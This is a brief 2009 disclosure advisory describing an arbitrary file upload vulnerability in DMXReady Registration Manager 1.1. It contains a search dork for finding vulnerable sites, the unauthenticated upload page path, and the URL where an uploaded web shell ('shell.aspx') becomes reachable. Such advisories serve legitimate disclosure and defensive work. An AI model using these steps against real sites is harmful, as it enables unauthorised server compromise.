DMXReady Registration Manager Arbitrary File Upload Vulnerability

2009-05-21T00:00:00
ID SECURITYVULNS:DOC:21853
Type securityvulns
Reporter Securityvulns
Modified 2009-05-21T00:00:00

Description

################### Securitylab.ir

Application Info:

Name: DMXReady Registration Manager

Version: 1.1

Website: http://www.dmxready.com

Discoverd By: Securitylab.ir

Website: http://securitylab.ir

Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir

Vulnerability Info:

Type: Arbitrary File Upload Vulnerability

Risk: High

Dork: "inc_webblogmanager.asp"

===========================================================

http://site.com/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp

select file and uploaded

view file : http://site.com/assets/webblogmanager/shell.aspx

===========================================================

Securitylab Security Research Team